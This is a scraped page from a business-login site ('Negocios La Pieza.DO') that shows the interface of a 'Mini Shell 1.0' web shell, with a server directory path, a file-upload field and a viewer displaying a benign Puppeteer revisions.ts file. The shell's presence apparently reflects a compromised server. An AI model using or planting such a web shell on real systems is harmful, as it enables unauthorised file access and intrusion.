HOME


Mini Shell 1.0
Negocios La Pieza.DO | Registrate o Inicia Sesión

Inicie Sesión en su Cuenta de Negocios

Olvidó Contraseña?
DIR: /var/www/node-app/node_modules/puppeteer-core/src/
Upload File :
Current File : //var/www/node-app/node_modules/puppeteer-core/src/revisions.ts
/**
 * @license
 * Copyright 2020 Google Inc.
 * SPDX-License-Identifier: Apache-2.0
 */

/**
 * @internal
 */
export const PUPPETEER_REVISIONS = Object.freeze({
  chrome: '128.0.6613.119',
  'chrome-headless-shell': '128.0.6613.119',
  firefox: 'stable_130.0',
});